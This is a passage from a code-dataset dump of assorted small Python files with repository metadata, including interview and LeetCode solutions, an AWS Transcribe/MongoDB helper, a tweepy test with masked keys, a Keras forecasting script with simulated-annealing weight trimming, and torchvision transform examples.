'--search',\n dest='search',\n help='search for programs',\n nargs=\"*\",\n action=\"extend\",\n type=str\n )\n\n return parser.parse_args()\n","repo_name":"Crinibus/tvguide","sub_path":"tvguide/argument.py","file_name":"argument.py","file_ext":"py","file_size_in_byte":2218,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"11859017908","text":"#!/usr/bin/python3\n\"\"\"method that determines if all the boxes can be opened\"\"\"\n\n\ndef canUnlockAll(boxes):\n \"\"\"Function to unlock all the boxes\"\"\"\n lengthBoxes = len(boxes)\n if not lengthBoxes:\n return False\n unlocked = [0]\n for key in unlocked:\n for box in boxes[key]:\n if box not in unlocked and box < lengthBoxes:\n unlocked.append(box)\n if len(unlocked) == lengthBoxes:\n return True\n return False\n","repo_name":"oscarmrt/holbertonschool-interview","sub_path":"0x00-lockboxes/0-lockboxes.py","file_name":"0-lockboxes.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"40471778570","text":"import tweepy\n\n#some tests trying to get tweet information using tweepy\n\napikey='***'\napikeysecret='***'\n\naccesstoken='***'\naccesstokensecret='***'\n\nauth = tweepy.OAuthHandler(apikey, apikeysecret)\nauth.set_access_token(accesstoken, accesstokensecret)\napi = tweepy.API(auth, wait_on_rate_limit=True)\n\ntarget = \"badiyonbot\"\nprint(\"getting data for \" + target)\nitem = api.get_user(target)\nprint(\"name: \" + item.name)\nprint(\"description: \" + item.description)\nprint(\"screen_name: \" + item.screen_name)\nprint(\"id: \" + str(item.id))\n\ntweets = api.home_timeline(target, trim_user=item.id)\nprint(tweets)\n","repo_name":"Badiyon/Python","sub_path":"TwitterBotProject/get_tweets.py","file_name":"get_tweets.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"29821611181","text":"import time\nimport json\nimport uuid\nimport boto3\nimport pymongo\nfrom urllib import request\nfrom dotenv import load_dotenv, dotenv_values\n\nload_dotenv()\nconfig = dotenv_values()\n\nclient = boto3.client('transcribe')\n\ncxn = pymongo.MongoClient(config['MONGO_URI'], serverSelectionTimeoutMS=5000)\ntry:\n # verify the connection works by pinging the database\n # The ping command is cheap and does not require auth.\n cxn.admin.command('ping')\n db = cxn[config['MONGO_DBNAME']] # store a reference to the database\n # if we get here, the connection worked!\n print(' *', 'Connected to MongoDB!')\nexcept Exception as e:\n # the ping command failed, so the connection is not available.\n # render_template('error.html', error=e) # render the edit template\n print(' *', \"Failed to connect to MongoDB at\", config['MONGO_URI'])\n print('Database connection error:', e) # debug\n\n\ndef start_transcription_job(s3_file_url: str, language_code: str = \"en-US\", job_name:str = None):\n if not job_name:\n job_name = str(uuid.uuid4())\n\n response = client.start_transcription_job(\n TranscriptionJobName=job_name,\n LanguageCode=language_code,\n Media={\n 'MediaFileUri': s3_file_url\n }\n )\n\n job = {\n \"name\": job_name,\n \"status\": response[\"TranscriptionJob\"][\"TranscriptionJobStatus\"],\n \"language\": response[\"TranscriptionJob\"][\"LanguageCode\"],\n \"media_file_url\": response[\"TranscriptionJob\"][\"Media\"][\"MediaFileUri\"],\n \"creation_time\": response[\"TranscriptionJob\"][\"CreationTime\"]\n }\n\n db.jobs.insert_one(job)\n\n return job_name, response\n\n\ndef get_transcription_job(job_name: str):\n job_status = -1\n\n while job_status not in [\"COMPLETED\", \"FAILED\"]:\n response = client.get_transcription_job(\n TranscriptionJobName=job_name\n )\n\n if response[\"TranscriptionJob\"][\"TranscriptionJobStatus\"] in [\"COMPLETED\", \"FAILED\"]:\n print(f'----- Transcription Job Finished with Status {response[\"TranscriptionJob\"][\"TranscriptionJobStatus\"]} -----')\n\n set_values = {\n \"status\": response[\"TranscriptionJob\"][\"TranscriptionJobStatus\"],\n \"start_time\": response[\"TranscriptionJob\"][\"StartTime\"],\n \"completion_time\": response[\"TranscriptionJob\"][\"CompletionTime\"],\n \"media_format\": response[\"TranscriptionJob\"][\"MediaFormat\"],\n \"media_sample_rate_hertz\": response[\"TranscriptionJob\"][\"MediaSampleRateHertz\"],\n \"transcript_file_uri\": response[\"TranscriptionJob\"][\"Transcript\"][\"TranscriptFileUri\"],\n }\n\n if response[\"TranscriptionJob\"][\"TranscriptionJobStatus\"] == \"COMPLETED\":\n results_response = request.urlopen(response[\"TranscriptionJob\"][\"Transcript\"][\"TranscriptFileUri\"])\n results_str = results_response.read()\n results_dict = json.loads(results_str)\n\n set_values[\"transcript\"] = results_dict[\"results\"][\"transcripts\"][0][\"transcript\"]\n set_values[\"transcript_items\"] = results_dict[\"results\"][\"items\"]\n\n db.jobs.update_one({\n \"name\": job_name\n }, {\n \"$set\": set_values\n })\n\n return response\n else:\n print(\"Current Job Status:\", response[\"TranscriptionJob\"][\"TranscriptionJobStatus\"])\n print(\"Waiting for 5 seconds...\\n\")\n\n time.sleep(5)","repo_name":"software-students-fall2022/containerized-app-exercise-team3","sub_path":"machine-learning-client/utils/aws_transcribe.py","file_name":"aws_transcribe.py","file_ext":"py","file_size_in_byte":3484,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"39991912157","text":"from setuptools import setup, find_packages\n\n\nversion = '0.1.0'\n\n\nsetup(name=\"helga-flip\",\n version=version,\n description=('Helga plugin to flip words'),\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Topic :: Communications :: Chat :: Internet Relay Chat',\n 'Framework :: Twisted',\n 'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.6',\n 'Programming Language :: Python :: 2.7',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n ],\n keywords='helga flip',\n author='Shaun Duncan',\n author_email='shaun.duncan@gmail.com',\n url='https://github.com/shaunduncan/helga-flip',\n license='GPLv3',\n packages=find_packages(),\n py_modules=['helga_flip'],\n entry_points = dict(\n helga_plugins=[\n 'flip = helga_flip:flip'\n ],\n ),\n)\n","repo_name":"shaunduncan/helga-flip","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7688011420","text":"from protocol import *\n\nclass Host:\n def __init__(self, ip):\n self.ip = ip\n self.total_bytes_received = 0\n self.bytes_sent = 0\n self.hosts = []\n self.protocols = []\n\n def process_host(self, event, length):\n host_list = [x for x in self.hosts if x.ip == event.src]\n if host_list:\n host = host_list[0]\n host.process_protocol(event, length)\n else:\n host = Host(event.src)\n protocol = Protocol(event.t_protocol, length)\n packet = Packet(event.src_port, event.dst_port, length)\n protocol.packets.append(packet)\n host.protocols.append(protocol)\n self.hosts.append(host)\n host.bytes_sent += length\n\n def process_protocol(self, event, length):\n protocol_list = [x for x in self.protocols if x.name == event.t_protocol]\n if protocol_list:\n protocol = protocol_list[0]\n protocol.process_packet(event, length)\n protocol.bytes_sent += length\n else:\n protocol = Protocol(event.t_protocol, length)\n packet = Packet(event.src_port, event.dst_port, length)\n protocol.packets.append(packet)\n self.protocols.append(protocol)\n","repo_name":"jnoziglia/networkAnalyzer","sub_path":"src/host.py","file_name":"host.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"11562335116","text":"\"\"\"\n# Definition for a Node.\nclass Node:\n def __init__(self, x: int, next: 'Node' = None, random: 'Node' = None):\n self.val = int(x)\n self.next = next\n self.random = random\n\"\"\"\n\nclass Solution:\n def copyRandomList(self, head: 'Optional[Node]') -> 'Optional[Node]':\n\n temp=head\n temp2=None\n if head==None:\n return temp2\n else:\n \n while(temp!=None):\n temp2=Node(temp.val)\n temp2.next=temp.next\n temp.next=temp2\n temp=temp.next.next\n temp=head\n while(temp!=None):\n if temp.random:\n temp.next.random=temp.random.next\n temp=temp.next.next\n \n temp=head\n\n temp2=head.next\n temp3=temp2\n while(temp.next.next!=None):\n temp.next=temp.next.next\n temp2.next=temp2.next.next\n temp=temp.next\n temp2=temp2.next\n temp.next=None\n temp2.next=None\n return temp3\n \n \n \n \n ","repo_name":"tjorgais/Leetcode","sub_path":"138-copy-list-with-random-pointer/138-copy-list-with-random-pointer.py","file_name":"138-copy-list-with-random-pointer.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"39717136634","text":"from collections import defaultdict\n\n\n# 可以将h 数组替换为堆,减少max 的查询操作,增加了插入和删除时的logn时间,\nclass Solution:\n def getSkyline(self, buildings):\n start, end, endheight, startheight = [], [], defaultdict(list), defaultdict(list)\n ret = []\n\n for ele in buildings:\n start.append(ele[0])\n end.append(ele[1])\n endheight[ele[1]].append(ele[2])\n startheight[ele[0]].append(ele[2])\n end.sort()\n\n def helper(arr, ele):\n while arr and arr[0] == ele:\n arr.pop(0)\n return arr\n\n h, maxval = [], 0\n while start or end:\n if start and start[0] <= end[0]:\n p = start.pop(0)\n start = helper(start, p)\n h.extend(startheight[p])\n if p == end[0]:\n for ele in endheight[end[0]]:\n h.remove(ele)\n p = end.pop(0)\n end = helper(end, p)\n elif (start and start[0] > end[0]) or not start:\n for ele in endheight[end[0]]:\n h.remove(ele)\n p = end.pop(0)\n end = helper(end, p)\n\n if not h:\n ret.append([p, 0])\n elif max(h) != maxval:\n maxval = max(h)\n ret.append([p, maxval])\n\n return ret\n\n\nsol = Solution()\nprint(sol.getSkyline([[2, 9, 10], [3, 7, 15], [5, 12, 12], [15, 20, 10], [19, 24, 8]]))\nprint(sol.getSkyline([[0, 1, 3]]))\nprint(sol.getSkyline([[0, 2, 3], [2, 5, 3]]))\nprint(sol.getSkyline([[3, 7, 8], [3, 8, 7], [3, 9, 6], [3, 10, 5], [3, 11, 4], [3, 12, 3], [3, 13, 2], [3, 14, 1]]))\n","repo_name":"shiyutang/DL-Prep","sub_path":"04_Algorithms/Leetcode/L218. the skyline problem.py","file_name":"L218. the skyline problem.py","file_ext":"py","file_size_in_byte":1742,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"81"} +{"seq_id":"22022677018","text":"from robot import Robot\n\nclass Fleet:\n def __init__(self):\n self.fleet_of_robots = []\n\n\n def create_fleet(self):\n robot1 = robots.Robot('Buzz', 250, 100)\n robot2 = robots.Robot('Max', 175, 70)\n robot3 = robots.Robot('Omega', 150, 60)\n self.robot_team.append(robot1, robot2, robot3)\n print(self.robot_team)\n\n","repo_name":"austindflatt/RobotsVsDinosaurs","sub_path":"fleet.py","file_name":"fleet.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"23841127947","text":"group = {}\ntotal = 0\ngroup_size = 0\n\nwith open(\"input.txt\", \"r\") as fp:\n for line in fp.readlines():\n line = line.rstrip()\n if (line == \"\"):\n for key, value in group.items():\n if value == group_size:\n total += 1\n group = {}\n group_size = 0\n else:\n group_size += 1\n for c in line:\n if c not in group:\n group[c] = 1\n else:\n group[c] += 1\n\n print(total)\n","repo_name":"samdubusc/adventofcode","sub_path":"2020/06/day06.py","file_name":"day06.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"30473196343","text":"from homework3 import *\n\n\ndef function_parse():\n \"\"\"\n ~F(x,y,John)\n :return:\n \"\"\"\n\n s=\"G(Albert, z, John)\"\n f=parse(s)[0]\n print(f.func)\n print(f.args)\n print(f.negation)\n\n\ndef function_is_constant():\n s=\"John\"\n t=\"x\"\n print(is_constant(s))\n print(is_constant(t))\n print(is_variable(s))\n print(is_variable(t))\n\n\ndef function_unification(e=None):\n f=open(\"unification_tests.txt\", 'r')\n data=f.read().split(\"\\n\\n\")\n if e is None:\n e=len(data)\n for d in data[0:e]:\n x,y = d.split('\\n')\n x = parse(x).predicates[0]\n y = parse(y).predicates[0]\n print(x, y)\n print(unification(x, y, {}))\n\n\ndef bool_to_string(a):\n return list(map(lambda x: str(x).upper(), a))\n\n\ndef full_test(e=None):\n f=open(\"all_inputs.txt\")\n data=f.read().split(\"\\n\\n\")\n f.close()\n if e is None:\n e = len(data)\n count = 1\n for raw_case in data[-1*e:]:\n print(\"testing case {}\".format(count))\n case = raw_case.split(\"\\n\")\n queries = int(case[0])\n ans = list(map(lambda x:x.upper(), case[-1*queries:]))\n inp = case[:-1*queries]\n f=open(\"input.txt\", 'w')\n f.write(\"\\n\".join(inp))\n f.close()\n output = bool_to_string(main())\n if ans == output:\n print(\"success\")\n else:\n print(\"fail\")\n print(raw_case)\n count += 1\n\n\nfull_test()\n","repo_name":"Rohithyeravothula/Logic-Resolution","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"35357843603","text":"plik=open('liczby.txt',\"r+\")\ntab=[]\nfor i in plik:\n tab.append(int(i.rstrip()))\ncount=0\nfor i in tab:\n reve = int(str(i)[::-1])\n sum=i+reve\n if sum == int(str(sum)[::-1]):\n count+=1\n\nprint(count)\n\n","repo_name":"Marrcel12/Python_zadania","sub_path":"59 zbior/zad2.py","file_name":"zad2.py","file_ext":"py","file_size_in_byte":209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17892819628","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nfrom sklearn import preprocessing as pr\n\nfrom keras.models import Sequential, Model\nfrom keras.layers import Dense,Activation\nfrom keras.optimizers import Adam\n\n###############################################################################\n# Loading the data\n###############################################################################\n\nGlobalDirectory=r\"/home/tavoglc/LocalData/\"\nDataDir=GlobalDirectory + \"PricesData.csv\"\n\n###############################################################################\n# Plot Functions\n###############################################################################\n\ndef PlotStyle(Axes): \n \"\"\"\n General style used in all the plots \n \n Axes -> matplotlib axes object\n \"\"\" \n Axes.spines['top'].set_visible(False)\n Axes.spines['bottom'].set_visible(True)\n Axes.spines['left'].set_visible(True)\n Axes.spines['right'].set_visible(False)\n Axes.xaxis.set_tick_params(labelsize=12)\n Axes.yaxis.set_tick_params(labelsize=12)\n\n\ndef ImageStyle(Axes): \n \"\"\"\n General style used in all the images\n \n Axes -> matplotlib axes object\n \"\"\" \n Axes.spines['top'].set_visible(False)\n Axes.spines['bottom'].set_visible(False)\n Axes.spines['left'].set_visible(False)\n Axes.spines['right'].set_visible(False)\n Axes.set_xticks([])\n Axes.set_yticks([])\n\ndef MakeNetworkWeightsPanel(NetworkWeights):\n \"\"\"\n Makes a panel with three rows an k columns, each column \n contains a visualization for each layer, an histogram and \n color map for the matrix and a line plot for the biases\n \n NetworkWeights -> list, output of model.get_weights() where model \n is a keras model \n \"\"\"\n nrows=3\n ncolumns=int(len(NetworkWeights)/2)\n\n indexs=[[(j,k) for j in range(nrows)] for k in range(ncolumns)]\n\n fig,axes=plt.subplots(nrows,ncolumns,figsize=(14,7))\n\n for k in range(ncolumns):\n \n aIndex,bIndex,cIndex=indexs[k]\n \n mappable=axes[aIndex].imshow(NetworkWeights[2*k])\n plt.colorbar(mappable,ax=axes[aIndex])\n \n axes[bIndex].hist(NetworkWeights[2*k].flatten(),bins=50)\n axes[cIndex].plot(NetworkWeights[2*k+1].flatten(),'bo-')\n \n ImageStyle(axes[aIndex])\n PlotStyle(axes[bIndex])\n PlotStyle(axes[cIndex])\n\n plt.tight_layout()\n\n###############################################################################\n# Pretreatement functions\n###############################################################################\n\n#Centra los datos a promedio 0 y desviacion estadndar unitaria\ndef Normalization(SeriesData):\n \"\"\"\n Time series normalization\n \n SeriesData -> List,array or data frame with the data\n \"\"\" \n cData=np.reshape(np.array(SeriesData),(-1,1))\n Scaler=pr.StandardScaler()\n FitScaler=Scaler.fit(cData)\n \n return FitScaler.transform(cData)\n\n#Itera a lo largo de la serie de datos \ndef SeriesToData(SeriesData,IntervalSize,Forecast):\n \"\"\"\n Generates a trainig and target datasets\n \n SeriesData -> List,array or data frame with the data\n IntervalSize -> int, Interval used for the sliding window\n Forecast -> int, time steps ahead from the las item in the window \n to be forecasted\n \"\"\" \n nSteps=len(SeriesData)\n AContainer=[]\n BContainer=[]\n \n for k in range(nSteps-IntervalSize-Forecast-1):\n \n AContainer.append(SeriesData[k:k+IntervalSize])\n BContainer.append(SeriesData[k+IntervalSize+Forecast])\n \n return np.array(AContainer),np.array(BContainer)\n\n###############################################################################\n# Neural Network Generation \n###############################################################################\n\n#Centra los datos a promedio 0 y desviacion estadndar unitaria\ndef NeuralGenerator(Shape,Nodes):\n \"\"\"\n Generates a keras deep neural network\n \n Shape -> int, fragment size from the sliding window \n Nodes -> int, Architecture of the neural network \n \"\"\" \n NeuralNet=Sequential()\n NeuralNet.add(Dense(Shape, input_shape=(Shape,)))\n NeuralNet.add(Activation('linear'))\n \n for val in Nodes:\n \n NeuralNet.add(Dense(val))\n NeuralNet.add(Activation('elu'))\n \n NeuralNet.add(Dense(1, name='Series'))\n NeuralNet.add(Activation('linear')) \n \n return NeuralNet\n\n#Centra los datos a promedio 0 y desviacion estadndar unitaria\ndef NeuralTrain(SeriesXVals,SeriesYVals,NetworkStructure):\n \"\"\"\n Trains a keras neural network \n \n SeriesXVals -> array, Training data \n SeriesYVals -> array, Training target\n NetworkStructure -> list,array Architecture of the neural network \n \"\"\" \n nEpochs=25\n net=NeuralGenerator(len(SeriesXVals[0]),NetworkStructure)\n decayRate=0.0000000001/nEpochs\n \n net.compile(loss='mean_squared_error', optimizer = Adam(lr=0.001,decay=decayRate))\n net.fit(SeriesXVals,SeriesYVals, batch_size=64, epochs=nEpochs, verbose=1,shuffle=True)\n TrainedModel=Model(net.input, net.get_layer('Series').output)\n \n return TrainedModel\n\n###############################################################################\n# Data visualization\n###############################################################################\n \nData=np.genfromtxt(DataDir,delimiter=',')\nScaledData=Normalization(Data[1:,1]).reshape(1,-1)[0]\n\nplt.figure(1)\nplt.plot(ScaledData)\nax=plt.gca()\nPlotStyle(ax)\n\nTrainSeries=ScaledData[0:int(0.9*len(ScaledData))]\nTestSeries=ScaledData[int(0.9*len(ScaledData)):len(ScaledData)]\n\nfig,axes=plt.subplots(1,2,figsize=(10,5),sharex=False,sharey=True)\n\naxes[0].plot(TrainSeries)\naxes[0].set_xlabel(\"Time\")\naxes[0].set_ylabel(\"Price\")\naxes[1].plot(TestSeries)\naxes[1].set_xlabel(\"Time\")\naxes[1].set_ylabel(\"Price\")\n\nPlotStyle(axes[0])\nPlotStyle(axes[1])\n\n###############################################################################\n# Training the network \n###############################################################################\n\nFragmentSize=35\nForecast=1\nCurrentArchitecture=[25,12,6,3]\n\nXtrain,Ytrain=SeriesToData(TrainSeries,FragmentSize,Forecast)\nXtest,Ytest=SeriesToData(TestSeries,FragmentSize,Forecast)\n\nSeriesModel=NeuralTrain(Xtrain, Ytrain, CurrentArchitecture)\n\nYpred=SeriesModel.predict(Xtest)\n\nplt.figure(3)\nplt.plot(Ypred)\nplt.plot(Ytest,'r')\nax=plt.gca()\nax.set_xlabel(\"Time\")\nax.set_ylabel(\"Price\")\nPlotStyle(ax)\n\nSeriesModel.compile(loss=\"mse\",optimizer=Adam())\nBasePerformance=SeriesModel.evaluate(Xtest,Ytest)\n\n###############################################################################\n# Visualizing the weights \n###############################################################################\n\nCurrentNetworkWeights=SeriesModel.get_weights()\n\nMakeNetworkWeightsPanel(CurrentNetworkWeights)\n\n###############################################################################\n# Trimming Functions\n###############################################################################\n\ndef GetWeightsRanges(WeightsShapes):\n \"\"\"\n Returns a list with the range of weights on each layer\n \n Percentage -> float, range [0,1] fraction of all the weights\n to be trimmed \n WeightsShapes -> list, list with the shapes of every layer in the network \n \"\"\"\n weightRanges=[0]\n for val in WeightsShapes:\n last=weightRanges[-1]\n if len(val)==2:\n weightRanges.append(last+val[0]*val[1])\n else:\n weightRanges.append(last+val[0])\n \n return weightRanges\n\ndef MakeRandomTrimmIndex(Percentage,TotalWeights):\n \"\"\"\n Returns a randomly generated index where the weights will be trimmed \n \n Percentage -> float, range [0,1] fraction of all the weights\n to be trimmed \n TotalWeights -> float, total number of weights\n \"\"\"\n nTrimmed=int(Percentage*TotalWeights)\n index=np.arange(TotalWeights)\n trimmIndex=np.random.choice(index,nTrimmed)\n trimmIndex=np.sort(trimmIndex)\n \n return trimmIndex\n\ndef BoundaryToElement(Value,Boundaries):\n \"\"\"\n Returns the index where a value is between the k and k+1 boundary\n Value -> int, value to be search\n Boundaries -> list, contains the boundaries of each element \n \"\"\"\n responce=-1\n for k in range(len(Boundaries)-1):\n \n if Value>=Boundaries[k] and Value List, contains the location of the weights to be trimmed \n Ranges ->List, boundaries of each element in the weights list\n \"\"\"\n nRanges=len(Ranges)\n nElements=nRanges-1\n indexPerElement=[[] for k in range(nElements)]\n \n for val in Index:\n iElement=BoundaryToElement(val,Ranges)\n indexPerElement[iElement].append(val)\n \n return indexPerElement\n\ndef TrimmByIndex(Index,NetworkWeights):\n \"\"\"\n Creates a new weights list with the trimmed weights\n Index -> list, Locations of the weights to be trimmed \n NetworkWeights ->List, output from kerasmodel.get_weights()\n \"\"\"\n weightsShapes=[val.shape for val in NetworkWeights]\n ranges=GetWeightsRanges(weightsShapes)\n indexPerElement=OrderIndexs(Index,ranges)\n newWeights=[]\n \n for k in range(len(NetworkWeights)):\n \n if len(indexPerElement[k])==0:\n localArray=NetworkWeights[k].copy()\n newWeights.append(localArray)\n \n else:\n localArray=NetworkWeights[k].copy()\n localArray=localArray.flatten()\n for val in indexPerElement[k]:\n localArray[val-ranges[k]]=0\n localArray=np.reshape(localArray,weightsShapes[k])\n newWeights.append(localArray)\n \n return newWeights\n\ndef RandomTrimming(Percentage,NetworkWeights):\n \"\"\"\n Creates a new weights list with randomly trimmed weights\n Percentage -> float, relative amount of the weights to be trimmed \n NetworkWeights ->List, output from kerasmodel.get_weights()\n \"\"\"\n weightsShapes=[val.shape for val in NetworkWeights]\n ranges=GetWeightsRanges(weightsShapes)\n index=MakeRandomTrimmIndex(Percentage,ranges[-1])\n \n return TrimmByIndex(index,NetworkWeights)\n\ndef GetTrimmPerformance(NetworkWeights,X,Y):\n \"\"\"\n Wrapper function to calculate the performace of the trimming \n operation \n \n NetworkWeights -> list, list of numpy arrays with the network weights\n X -> array, test data\n Y -> array, test data\n \"\"\"\n localNetwork=NeuralGenerator(FragmentSize,CurrentArchitecture)\n localNetwork.set_weights(NetworkWeights)\n localNetwork.compile(loss=\"mse\",optimizer=Adam())\n \n return localNetwork.evaluate(X,Y)\n\n###############################################################################\n# Trimming Performance \n###############################################################################\n\npercentages=np.logspace(0.0001,0.05,50)\npercentages=np.array([np.log10(val) for val in percentages])\n\nperformances=[]\n\nfor val in percentages:\n newWeights=RandomTrimming(val,CurrentNetworkWeights)\n performances.append(1-(GetTrimmPerformance(newWeights,Xtest,Ytest)/BasePerformance))\n\nplt.figure(5)\nplt.plot(100*np.array(percentages),performances,'bo-')\nax=plt.gca()\nax.set_xlabel(\"Trimm %\")\nax.set_ylabel(\"Performance\")\nPlotStyle(ax)\n\n###############################################################################\n# Simulated annealing trimming \n###############################################################################\n\nranges=GetWeightsRanges([val.shape for val in CurrentNetworkWeights])\nTotalWeights=ranges[-1]\n\ndef ObjetiveFunction(Index):\n \"\"\"\n Wrapper function for the objetive function\n Index -> List with the weight locations to be trimmed.\n \"\"\"\n newWeights=TrimmByIndex(Index,CurrentNetworkWeights) \n return GetTrimmPerformance(newWeights,Xtest,Ytest)\n\ndef AcceptanceProbability(Cost,NewCost,Temperature):\n \"\"\"\n Probability to accept a proposed state\n Cost -> float, cost of the previous state \n NewCost -> float, cost of the current state \n Temperature -> float, current temperature in the optimizer\n \"\"\"\n if NewCost List with the weight locations to be trimmed.\n \"\"\"\n for k in range(len(Index)):\n if Index[k]>=TotalWeights:\n Index[k]=int(np.random.choice(np.arange(0,TotalWeights-1),1))\n return Index\n\ndef RandomNeighbour(State,Fraction):\n \"\"\"\n Makes a small change to randomly selected items in the State \n State -> List with the weight locations to be trimmed.\n Fraction -> float, optimizer temperature\n \"\"\"\n nToModify=int(len(State)/4)\n indexToModify=np.arange(0,len(State))\n np.random.shuffle(indexToModify)\n newState=State.copy()\n \n for val in indexToModify[0:nToModify]:\n delta=(TotalWeights*Fraction/10)*(np.random.random())\n newState[val]=int(newState[val]+delta)\n \n return ForceRange(newState)\n \n\ndef SimulatedAnnealing(StartState,maxSteps=300):\n \"\"\"\n Weight trimming optimization by simulated annealing\n StartState -> List with the weight locations to be trimmed.\n maxSteps -> int, number of steps taken by the optimizer \n \"\"\" \n state=StartState\n cost=ObjetiveFunction(StartState)\n states,costs=[state],[cost]\n \n for k in range(maxSteps):\n fraction=k/float(maxSteps)\n T=Temperature(fraction)\n newstate=RandomNeighbour(state,fraction)\n newcost=ObjetiveFunction(newstate)\n if AcceptanceProbability(cost,newcost,T)>np.random.random():\n state,cost=newstate,newcost\n states.append(state)\n costs.append(cost)\n \n return states,costs\n\n###############################################################################\n# Simulated annealing trimming \n###############################################################################\n\nStartGuess=np.random.choice(np.arange(0,TotalWeights),size=125)\nStates,Costs=SimulatedAnnealing(StartGuess,400)\n\nNewWeights=TrimmByIndex(States[np.argmin(Costs)],CurrentNetworkWeights)\n\nTrimmNetwork=NeuralGenerator(FragmentSize,CurrentArchitecture)\nTrimmNetwork.set_weights(NewWeights)\nTrimmNetwork.compile(loss=\"mse\",optimizer=Adam())\n\nYtrimTrain=TrimmNetwork.predict(Xtrain)\nYtrimTest=TrimmNetwork.predict(Xtest)\n\nfig,axes=plt.subplots(1,2,figsize=(10,5),sharex=False,sharey=True)\n\naxes[0].plot(Ytrain)\naxes[0].plot(YtrimTrain,'r-',alpha=0.75)\naxes[0].set_xlabel(\"Time\")\naxes[0].set_ylabel(\"Price\")\naxes[1].plot(Ytest)\naxes[1].plot(YtrimTest,'r-',alpha=0.75)\naxes[1].set_xlabel(\"Time\")\naxes[1].set_ylabel(\"Price\")\n\nPlotStyle(axes[0])\nPlotStyle(axes[1])\n","repo_name":"TavoGLC/DataAnalysisByExample","sub_path":"NeuralNetworks/SimulatedAnnealing.py","file_name":"SimulatedAnnealing.py","file_ext":"py","file_size_in_byte":15220,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"81"} +{"seq_id":"40209802067","text":"from django.conf.urls import patterns, url\n\nfrom raw_data_analytics import views\n\nurlpatterns = patterns('',\n url(r'^$', views.home, name='raw_data_analytics'),\n url(r'^execute/$', views.execute, name='execute'),\n url(r'^dropdown_partner',views.dropdown_partner,name='dropdown_partner'),\n url(r'^dropdown_state/$', views.dropdown_state, name='dropdown_state'),\n url(r'^dropdown_district/$', views.dropdown_district, name='dropdown_district'),\n url(r'^dropdown_block/$', views.dropdown_block, name='dropdown_block'),\n url(r'^dropdown_village/$', views.dropdown_village, name='dropdown_village'),\n url(r'^dropdown_video/$', views.dropdown_video, name='dropdown_video'),\n url(r'^dropdown_category', views.dropdown_category, name='dropdown_category'),\n url(r'^dropdown_subcategory', views.dropdown_subcategory, name='dropdown_subcategory'),\n url(r'^dropdown_videop', views.dropdown_videop, name='dropdown_videop'),\n url(r'^dropdown_tag', views.dropdown_tag, name='dropdown_tag'),\n \n \n\n # url(r'^output/$', views.create_excel_html, name='output'),\n\n )\n","repo_name":"soitun/dg","sub_path":"raw_data_analytics/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"81"} +{"seq_id":"38641343680","text":"from PIL import Image\r\nfrom torch.utils.tensorboard import SummaryWriter\r\nfrom torchvision import transforms\r\n\r\nwriter = SummaryWriter(\"logs\")\r\n#writer是一个文件夹\r\nimg = Image.open(\"images/ceshi.jpg\")\r\nprint(img)\r\n\r\n#totensor来转换格式(tensor格式)\r\ntrans_totensor = transforms.ToTensor()\r\nimg_tensor = trans_totensor(img)\r\nprint(img_tensor.shape)\r\nwriter.add_image(\"ToTensor\", img_tensor)\r\nwriter.close()\r\n\r\n# Normalize归一化\r\nprint(img_tensor[0][0][0])\r\n#归一化的计算公式input[channel] = (input[channel] - mean[channel]) / std[channel]\r\ntrans_norm = transforms.Normalize([0.6,0.6,0.6],[0.8,0.7,0.3])\r\n#参数1【mean】:每个信道的平均值序列;参数2【std】:每个信道标准差序列 这里的数字是随便写的,可以自己改\r\n#rgb是三信道\r\nimg_norm = trans_norm(img_tensor)\r\nprint(img_norm[0][0][0])\r\nprint(img_norm[1][1][1])\r\nwriter.add_image(\"Normalize\",img_norm,2)\r\n\r\n# Resize 改变图片大小\r\nprint(img)\r\nimg.show()\r\ntrans_resize = transforms.Resize(200)\r\nimg_resize = trans_resize(img)\r\nprint(img_resize)\r\nimg_resize.show()\r\n\r\n#Compose()用法,需要一个列表。\r\n#所以得到 Compose([transforms参数1,transforms参数2,。。。])\r\ntrans_resize_2 = transforms.Resize((512,512))\r\n#PIL > PIL >tensor\r\ntrans_compose = transforms.Compose([trans_resize_2,trans_totensor])\r\nimg_resize_2 = trans_compose(img)\r\nprint(img_resize_2)\r\nwriter.add_image(\"Resize\",img_resize_2,1)\r\n\r\n#RandomCrop\r\n#随意裁剪512大小的图片\r\ntrans_random = transforms.RandomCrop((200,200))\r\ntrans_compose_2 = transforms.Compose([trans_random,trans_totensor])\r\nfor i in range(10):\r\n img_crop = trans_compose_2(img)\r\n 